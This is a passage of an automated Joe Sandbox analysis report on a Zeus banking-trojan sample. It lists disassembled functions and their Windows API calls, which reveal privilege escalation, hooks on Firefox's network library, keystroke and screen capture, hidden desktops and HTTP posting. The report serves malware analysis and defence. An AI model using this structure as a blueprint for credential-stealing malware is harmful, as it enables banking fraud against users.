FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041CA0D

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,?,00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(?), ref: 00414B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041C9A1

Part of subcall function 0041C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C9FB,00000000,?,?,?), ref: 0041C8C6
Part of subcall function 0041C8A1: CloseHandle.KERNEL32(?), ref: 0041C907

Strings

.exe, xrefs: 0041C93B
SeTcbPrivilege, xrefs: 0041C997

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CC912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 003CC929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,003CD2A8), ref: 003CC955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?), ref: 003CC96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?), ref: 003CC984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?,00000000), ref: 003CCA0D

Part of subcall function 003C4A87: GetCurrentThread.KERNEL32(00000020,00000000,003CC9A1,00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A97
Part of subcall function 003C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A9E
Part of subcall function 003C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,003CC9A1,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4AB0
Part of subcall function 003C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,003CC9A1,?), ref: 003C4AD4
Part of subcall function 003C4A87: AdjustTokenPrivileges.ADVAPI32(003CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 003C4AE9
Part of subcall function 003C4A87: GetLastError.KERNEL32 ref: 003C4AF3
Part of subcall function 003C4A87: CloseHandle.KERNEL32(003CC9A1), ref: 003C4B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?,00000000), ref: 003CC9A1

Part of subcall function 003CC8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,003CC9FB,00000000,?,?,?), ref: 003CC8C6
Part of subcall function 003CC8A1: CloseHandle.KERNEL32(?), ref: 003CC907

Strings

SeTcbPrivilege, xrefs: 003CC997
.exe, xrefs: 003CC93B

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004150A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 004150EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00415112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00415137
InternetCloseHandle.WININET(00000000), ref: 0041514F

Strings

Connection: close, xrefs: 00415103, 00415110
POST, xrefs: 004150C9
GET, xrefs: 004150D0, 004150E7
HTTP/1.1, xrefs: 004150DF

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C5CA, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0041C5ED
LdrLoadDll.NTDLL(?,?,?,?), ref: 0041C5FD
EnterCriticalSection.KERNEL32(0042400C), ref: 0041C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0041C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 0041C64C

Part of subcall function 0040C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

LeaveCriticalSection.KERNEL32(0042400C), ref: 0041C669

Strings

nss3.dll, xrefs: 0041C646
nspr4.dll, xrefs: 0041C63A

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CBD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

EnterCriticalSection.KERNEL32(Function_00023FE4), ref: 003CBDB7
LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CBDE5
EnterCriticalSection.KERNEL32(Function_00023FE4), ref: 003CBE09

Part of subcall function 003C14C3: InternetCrackUrlA.WININET ref: 003C17AC
Part of subcall function 003C14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 003C17CA
Part of subcall function 003C14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 003C18E4
Part of subcall function 003C14C3: EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1910
Part of subcall function 003C14C3: LeaveCriticalSection.KERNEL32(003D2AC8,?,?), ref: 003C194D

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

Part of subcall function 003C835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 003C83B8

Part of subcall function 003C40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 003C410D

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

LeaveCriticalSection.KERNEL32(Function_00023FE4,00000000,?,00000000), ref: 003CC04C

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC06B
LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC078

Strings

%x, xrefs: 003CBF11
Content-Length, xrefs: 003CBF55
0, xrefs: 003CBF31

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00409489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004094EF

Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 004092D4
Part of subcall function 0040929D: StrStrIW.SHLWAPI(?,?), ref: 0040935C
Part of subcall function 0040929D: StrStrIW.SHLWAPI(?,?), ref: 0040936D
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00409389
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 004093A7
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004093C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0040950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00409582

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040961F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

$, xrefs: 00409552
#, xrefs: 00409567
&, xrefs: 00409560

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B9489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 003B94EF

Part of subcall function 003B929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 003B92D4
Part of subcall function 003B929D: StrStrIW.SHLWAPI(?,?), ref: 003B935C
Part of subcall function 003B929D: StrStrIW.SHLWAPI(?,?), ref: 003B936D
Part of subcall function 003B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B9389
Part of subcall function 003B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 003B93A7
Part of subcall function 003B929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 003B93C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 003B950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 003B9582

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 003B961F

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

#, xrefs: 003B9567
&, xrefs: 003B9560
$, xrefs: 003B9552

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 0041B053

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

EnterCriticalSection.KERNEL32(00423FB4), ref: 0041AF36
LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AFD9

Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040EA43
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040EA54
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0040EA61
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0040EA6E
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0040EA7B
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0040EA88
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0040EA95
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0040EAA2
Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0040EAEA
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040EAF5
Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040EB07
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040EB12
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0040EB1E
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0040EB2B
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0040EB38
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0040EB45
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0040EB52
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0040EB5F
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(00000000), ref: 0040EE9C
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(?), ref: 0040EEA6
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(00000000), ref: 0040EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 0041AF9B

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

GetKeyboardState.USER32(?), ref: 0041AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0041B01B

Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

Strings

, xrefs: 0041B039

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C51FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003C521D

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 003C524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 003C5267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003C5282
FlushFileBuffers.KERNEL32(00000000), ref: 003C52A2

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

CloseHandle.KERNEL32(00000000), ref: 003C52B5

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

Strings

P>Z>d>2>n><>F>, xrefs: 003C5267

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(00423FE4,76C61857,0040C185,00422360), ref: 0041B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 0041B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 0041B602

Strings

PR_GetError, xrefs: 0041B5F2
PR_SetError, xrefs: 0041B5E0
PR_GetNameForIdentity, xrefs: 0041B5BE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CB58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(003D3FE4,76C61857,003BC185,003D2360), ref: 003CB5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 003CB5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 003CB5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 003CB602

Strings

PR_SetError, xrefs: 003CB5E0
PR_GetNameForIdentity, xrefs: 003CB5BE
PR_GetError, xrefs: 003CB5F2

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00407206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 00416444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00416463
Part of subcall function 00416444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,00407518,?), ref: 004164B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 004072EB
SetThreadPriority.KERNEL32(00000000), ref: 004072F2

Part of subcall function 0041D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041D88A
Part of subcall function 0041D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0041D89D
Part of subcall function 0041D865: GetProcessWindowStation.USER32 ref: 0041D8AE
Part of subcall function 0041D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041D8E9
Part of subcall function 0041D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0041D8FD
Part of subcall function 0041D865: GetCurrentThreadId.KERNEL32(?,?,?,0040731A,?,2937498D,?,00000000), ref: 0041D909
Part of subcall function 0041D865: GetThreadDesktop.USER32(00000000), ref: 0041D910
Part of subcall function 0041D865: SetThreadDesktop.USER32(00000000), ref: 0041D922
Part of subcall function 0041D865: CloseDesktop.USER32(00000000), ref: 0041D934
Part of subcall function 0041D865: CloseWindowStation.USER32(?), ref: 0041D94F

Part of subcall function 0040DD09: TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
Part of subcall function 0040DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
Part of subcall function 0040DD09: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
Part of subcall function 0040DD09: CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
Part of subcall function 0040DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DDF5
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
Part of subcall function 0040DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,?), ref: 0040DE56
Part of subcall function 0040DD09: CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
Part of subcall function 0040DD09: GetDC.USER32(00000000), ref: 0040DF15
Part of subcall function 0040DD09: CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
Part of subcall function 0040DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
Part of subcall function 0040DD09: SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
Part of subcall function 0040DD09: ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

GetShellWindow.USER32 ref: 00407338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0040736B

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004073CD
CloseHandle.KERNEL32(?), ref: 004073DD
CloseHandle.KERNEL32(?), ref: 004073E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 004073F2

Part of subcall function 0040D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0040E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0040D714
Part of subcall function 0040D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040D72F
Part of subcall function 0040D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0040D7C1
Part of subcall function 0040D4B4: GetSystemMetrics.USER32(00000017), ref: 0040D8DB
Part of subcall function 0040D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0040DC67

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 004165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00416600
Part of subcall function 004165B7: send.WS2_32(?,?,00000000,00000000), ref: 0041661A
Part of subcall function 004165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00416657

Part of subcall function 0041675E: shutdown.WS2_32(00000000,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(00000000), ref: 0041676D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00416774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004167A7

Part of subcall function 00416403: socket.WS2_32(?,00000001,00000006), ref: 0041640C
Part of subcall function 00416403: connect.WS2_32(00000000,?,-0000001D), ref: 0041642C
Part of subcall function 00416403: closesocket.WS2_32(00000000), ref: 00416437

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B7206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 003C6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 003C6463
Part of subcall function 003C6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,003B7518,?), ref: 003C64B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 003B72EB
SetThreadPriority.KERNEL32(00000000), ref: 003B72F2

Part of subcall function 003CD865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 003CD88A
Part of subcall function 003CD865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 003CD89D
Part of subcall function 003CD865: GetProcessWindowStation.USER32 ref: 003CD8AE
Part of subcall function 003CD865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 003CD8E9
Part of subcall function 003CD865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003CD8FD
Part of subcall function 003CD865: GetCurrentThreadId.KERNEL32(?,?,?,003B731A,?,2937498D,?,00000000), ref: 003CD909
Part of subcall function 003CD865: GetThreadDesktop.USER32(00000000), ref: 003CD910
Part of subcall function 003CD865: SetThreadDesktop.USER32(00000000), ref: 003CD922
Part of subcall function 003CD865: CloseDesktop.USER32(00000000), ref: 003CD934
Part of subcall function 003CD865: CloseWindowStation.USER32(?), ref: 003CD94F

